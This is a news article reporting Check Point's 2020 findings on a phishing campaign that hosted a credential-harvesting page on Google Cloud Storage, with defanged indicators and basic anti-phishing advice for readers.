Threat Actors Exploited Google Clouds to Launch Phishing Attacks

Actors Exploited Google
Share It On:

21 August 2020, Kathmandu

Sometimes we are unable to comprehend the advancement the world is making in terms of digital transformation. And those moments when we choose to ignore the threats that come with it, it is often too late. A report from Check Point Research stated a phishing attack that exploited Google Cloud.

Yes! The clouds may not be the safest place, after all.

Threat actors were found exploiting Google Cloud to host malicious payloads and launch phishing attacks.

Google may have dealt with this vulnerability, but it is up to us to stay vigilant and protect our data. In this article, we will also be discussing some ways how you can do that, especially on cloud services.

Let’s break down the Google Cloud Phishing Journey.

How did it Happen?

First, threat actors uploaded a PDF to Google Drive. They disguised the PDF to resemble a Microsoft SharePoint notice, but in reality, it contained a link to an MS Access Document.

actors uploaded a PDF to Google Drive
Image: Check Point

Once clicked, the link redirected the user to a phishing page hosted on storage.googleapis[.]com/asharepoint-unwearied-439052791/index.html.

The phishing page would then prompt the user to login with their Office 365 or organization email and password.

After the user would enter the login credentials, the page redirected to a real PDF report published by a renowned global consulting firm.

And, that’s the trick! Users wouldn’t be suspicious even for a second because they would think that they were viewing something useful.

Also, because the phishing page is hosted on Google Cloud Storage.

It is also difficult for security professionals to identify or detect such phishing campaigns for the same reason.

However, viewing the phishing page’s source code has revealed that most of the resources are loaded from a website that belongs to the attackers, prvtsmtp[.]com:”, the report stated.

page hosted on Google Cloud Storage

After further investigation of the website, researchers came to know that it was resolved to a Ukrainian IP address.

What Next?

Well, Google has a zero-day tolerance policy. So, it immediately suspended the phishing URL and all those associated with it.

There are also some incidents in the past where threat actors would host phishing pages using Dropbox and Microsoft Azure.

Also Read: Cyber Criminals Attention Shifting On ‘Email Phishing’

How To Prevent Such Phishing Attacks?

Check Point also suggested some precautionary measures to protect users against such phishing attacks.

Have a look at the following points:

  • Beware of lookalike domains and spelling errors. Unfamiliar email senders and spelling errors are a straight giveaway.
  • Take caution opening or downloading files received via email from unknown senders. Try to make sense of any suspicious call-to-action and subject line.
  • Ensure that you order products/services from an authentic source. One way to do that could be NOT clicking on promotional links in emails. Try to Google the desired service instead.
  • Beware of ‘special’ offers that could be nothing but a scam. For instance, ‘an exclusive cure for coronavirus for $150’. That should be a dead giveaway.
  • Try to keep separate passwords between different applications and accounts.

As they say, “Users’ mailboxes are the front door into your organization.”

Email security has become a necessity, which needs proper attention in organization architecture.

How often do you come across such potential scams or suspicious emails?

Do let us know in the comments!

Recommended Reads:


Share It On:

Recent Posts

Citizens Bank 11.11 Deals: Exclusive Discounts on Daraz

Citizens Bank 11.11 Deals: Exclusive Discounts on Daraz

Share It On:5th November 2024, Kathmandu Citizens Bank International Limited signed an agreement with Nepal’s leading online marketplace, Daraz, to

Local Talent Shines in Cybersecurity: Bipu Ojha and Tuan Khuat Win CDU IT CodeFair CTF

Local Talent Shines in Cybersecurity: Bipu Ojha and Tuan Khuat

Share It On:5th November 2024, Kathmandu Bipu Ojha and his teammate Tuan Khuat have emerged as winners in the prestigious

CEDB Hydropower’s Extraordinary General Meeting Concluded: Five Directors Elected

CEDB Hydropower’s Extraordinary General Meeting Concluded: Five Directors Elected

Share It On: 5th November 2024, Kathmandu CEDB Hydropower Development Company Limited has successfully concluded its extraordinary general meeting. CEDB

Government’s Journalist Accident Insurance Program: Apply Now For Your Protection

Government’s Journalist Accident Insurance Program: Apply Now For Your Protection

Share It On: 5th November, Kathmandu The Department of Information and Broadcasting has announced the launch of a new insurance

Nepal Life’s Property Acquisition in Hetauda: A Strategic Move For Growth

Nepal Life’s Property Acquisition in Hetauda: A Strategic Move For

Share It On:5th November, Kathmandu Nepal Life Insurance, a leading life insurance company in Nepal, has recently expanded its footprint

Global IME Dividend Announcement: Key Book Closure Date Revealed

Global IME Dividend Announcement: Key Book Closure Date Revealed

Share It On:5th November 2024, Kathmandu Global IME Bank has good news for its shareholders! The bank has announced a